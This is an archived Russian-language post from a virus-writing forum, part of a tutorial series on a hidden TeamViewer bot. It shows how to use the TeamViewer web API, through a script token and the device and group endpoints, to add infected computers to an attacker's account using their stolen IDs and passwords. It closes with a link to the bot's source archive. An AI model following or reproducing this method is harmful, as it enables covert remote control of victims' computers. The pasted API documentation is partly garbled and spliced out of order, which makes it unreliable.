• ! Привет посетитель !

    Зачем данный ресурс нужен ?

    В рунете было много ресурсов с интересными обсуждениями и работами по вирусным технологиям, а также в область ИБ.

    Но со временем у людей меняются интересы, а кто-то просто не может держать такие сайты, сайты удаляются, я подумал а печему-бы не сделать такой архив со статьями на тематику вирусов и ИБ.

    Цель ресурса:

    Собрать какие-то актуальные утеренные обсуждения и работы.

    Пока-что поднял два сайта:

    1) https://archivevx.net/exelab/f/

    2)Vxlab.info - Тут просто сделаю перепост статей сюда:https://archivevx.net/index.php?forums/vxlab-info-Статьи-ресурса.4/

Создаём скрытый TeamViewer #5

Итак, окно TeamViewer скрыто, ID и пароль получены. Теперь нужно получить данные авторизации.

Полистав сайт TV можно обнаружить что у него имеется бесплатное API, позволяющее управлять пользователями и создавать группы. С помощью сайта TV можно управлять заражёнными компьютерами из веб консоли!

План работы:
  1. зарегистрировать аккаунт на сайте https://login.teamviewer.com/
  2. создать токен (Редактировать профиль -> Приложения -> Создать маркер скрипта)
    1. Задать имя (произвольное)
    2. Управление группами (Разрешить редактировать)
    3. Компьютеры и контакты (Разрешить редактировать)
    4. Полученный маркер использовать в боте
1608891165912.png


Теперь у нас есть маркер, который мы будем использовать для добавления зараженных компьютеров в наш аккаунт. Что нам говорит документация API TV? Маркер вставляется в каждый запрос в HTTP заголовок:
Код:
"Authorization: Bearer %s" - подставляется маркер

Ping — проверяет работу маркера:
Код:
GET /api/v1/ping
 
Parameters
None
 
Return values
 token_valid – Is set to true if the provided access token is OK and the message is signed correctly. In all other cases the value is set to false.
 
Authentication
Access tokens are optional but will be verified if provided. Scope: None required.
 
Description
This function can be used to check if the API is available. It can also be used to verify if the token is valid.
 
Example
Request
             GET /api/v1/ping
Response
3.2 Account Management
3.2.1 GET /api/v1/account (retrieve account data)
 
Parameters
None.
 
HTTP/1.1 200 OK
  Content-Type: application/json
{"token_valid":false}

Добавление устройства:
Код:
POST /api/v1/devices (add a new device) Parameters
 remotecontrol_id – The TeamViewer ID of the device to be added.
 groupid – The group in which the device is to be added.
 description (optional) – The description of the device.
 alias (optional) – The alias of the device.
 password (optional) – A password that will be used when connecting to the device.
 
Return values
On success, the device is returned with the same values as in GET /devices.
 
Authentication
User access token. Scope: ContactList.Write.
 
Description
Adds a device to the computers & contacts list. An error is returned if either
 the device is already present in the computers & contact list in a group owned by the current user.
 the user does not have sufficient rights to add a device in the specified group.

remotecontrol_id и password мы сграбили ранее, groupid — это ID группы, которую нужно добавить.

Добавление группы:
Код:
POST /api/v1/groups (create a new group)
(POST /api/v1/users/<uID>/groups for company access token)
 
Parameters
 name – Name of the new group.
 policy_id (optional) – ID of the policy that will be assigned to the group. Must be a policy ID.
 
Return values
 id – Group ID of the newly created group.
 name – Name of the new group. This should be the same parameter as the input parameter.
 permissions – Will always be owned, because the group is not yet shared at this point.
 policy_id (optional) – ID of the policy that is assigned to the group. License restrictions ap- ply, see chapter Licensing.
 
Authentication
User or company access token. Scope: Groups.Create.
 
Description
Creates a new group and returns its info.

name — любое имя, или если группа уже имеется то получение id по имени:
Код:
GET /api/v1/groups (list all available groups)
(GET /api/v1/users/<uID>/groups for company access token)
 
Parameters
 name (optional) – Group name or part of the group name
 shared (optional) – True: list only shared groups, i. e. groups where the current user is not the owner. False: list only not shared groups, i. e. groups owned by the current user. If left out both types will be in the list.
 
Return values
PUT /api/v1/users/u123
  Content-Type: application/json
{ "name" : "John Locke" }

groups – List of groups.
 id–GroupID
 name – Name of the group.
 shared_with (optional) – List of users who this group is shared with. Can be omitted if
empty.
o userid – User ID of the user the group is shared with.
 
o name – Name of the user the group is shared with.
o permissions–Access-permissionsoftheuseronthisgroup.Eitherreadorread-
write.
o pending – true if the user hasn't accepted the shared group yet, otherwise the field can
be omitted.
 owner (optional) – Owner of this group. Omitted if the owner is the current user.
o userid – User ID of the owner of this group.
o name – Name of the owner of this group.
 permissions–read,readwriteorowned.
 policy_id (optional) – ID of the policy that is assigned to the group. License restrictions ap-
ply, see chapter Licensing.
 
Authentication
User or company access token. Scope: Groups.Read.
 
Description
Returns a list of groups.

Эти два запроса нам дадут gid и с помощью него мы добавим зараженный компьютер в наш аккаунт!

Собственно на этом все что я хотел рассказать, надеюсь было интересно.

Исходник бота можно качнуть тут:https://www.archivevx.net/download/tv_release.tar.zip

Пароль:111